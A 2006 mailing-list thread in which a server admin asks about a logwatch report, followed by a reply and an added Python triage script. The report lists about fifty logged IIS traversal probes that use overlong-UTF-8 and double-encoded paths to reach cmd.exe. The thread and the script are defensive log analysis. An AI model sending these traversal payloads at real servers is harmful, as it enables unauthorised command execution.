
Date:  Wed, 20 Sep 2006 08:24:34 +0100
From:  "Darren Wolfe" <darren (at mark) intersys-group.com>
Subject:  [coba-e:07106] Re: Concerned - anything to worry about??
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <076301c6dc85$d2a9c3e0$2600a8c0 (at mark) iml.local>
In-Reply-To:  <4510D8C2.1030206 (at mark) planetcentral.net>
X-Mail-Count: 07106

Hi Paul,

Nothing to worry about, just some automated attack script for Windows
servers (and quite an old one by the looks of it, this exploit was closed a
long time ago IIRC).  You don't have any of these files on your server and
even if they were they wouldn't execute anyway.

Another day in the life of a machine on the internet, I'm afraid!

-----Original Message-----
From: paul [mailto:paul (at mark) planetcentral.net] 
Sent: 20 September 2006 07:00
To: coba-e (at mark) bluequartz.org
Subject: [coba-e:07105] Concerned - anything to worry about??

Checked my logwatch mail this morning and found this - is it anything to 
worry about???
I mean I know they were looking for mostly Windows files, but does this 
mean my system's been compromised ????

Thx
Paul

 total of 1 sites probed the server 
  www.mydomain.net 218.92.93.181  

!!!! 50 possible successful probes 
 /cgi-bin/cmd.exe?/c+dir HTTP Response 302 
 /bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/root.exe?/c+dir HTTP Response 302 
 /_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/cmd32.exe?/c+dir HTTP Response 302 
 /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /Cgi-Bin/cmd32.exe?/c+dir HTTP Response 302 
 /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /script/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/cmd.exe?/c+dir HTTP Response 302 
 /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /cgi-Bin/cmd.exe?/c+dir HTTP Response 302 
 /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302 
 /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP Response 302 
 /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
Response 302 
 



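Added example (not part of the original messages): a small Python triage of the logwatch report above, which tags each probe by the trick used in its path and separates 2xx responses from redirects and errors. The sample lines are copied from the report, plus one constructed 200 line for contrast; the rule that only 2xx responses need follow-up is an assumption of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Lines copied from the report above (one still mail-wrapped), plus a
# constructed "200" line that is NOT in the report, for contrast.
SAMPLE = """\
 /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
 /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
 /scripts/root.exe?/c+dir HTTP Response 302
 /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
Response 302
 /scripts/cmd.exe?/c+dir HTTP Response 200
"""

LINE = re.compile(r"^\s*(\S+) HTTP Response (\d{3})\s*$")
WRAP = re.compile(r"\s*\n(?=(?:HTTP )?Response \d)")  # undo mail line-wrapping

def classify(url):
    """Tag the probe by what its path is trying to do."""
    path = url.split("?", 1)[0]
    raw = unquote_to_bytes(path)          # one round of percent-decoding
    tags = []
    # 0xC0/0xC1 can only begin an overlong 2-byte sequence: never valid UTF-8
    if any(b in (0xC0, 0xC1) for b in raw):
        tags.append("overlong-utf8")
    # a %XX escape surviving one decode means the path was encoded twice
    if re.search(rb"%[0-9a-fA-F]{2}", raw):
        tags.append("double-encoded")
    if re.search(r"(cmd|cmd32|root)\.exe$", path, re.I):
        tags.append("windows-shell")
    return tags

def verdict(status):
    # Assumption of this example: only a 2xx means content was served.
    return "investigate" if 200 <= status < 300 else "probe-only"

def triage(report):
    rows = []
    for line in WRAP.sub(" ", report).splitlines():
        m = LINE.match(line)
        if m:
            url, status = m.group(1), int(m.group(2))
            rows.append((url, status, classify(url), verdict(status)))
    return rows

if __name__ == "__main__":
    for url, status, tags, v in triage(SAMPLE):
        print(f"{status} {v:<11} {','.join(tags):<28} {url}")
```
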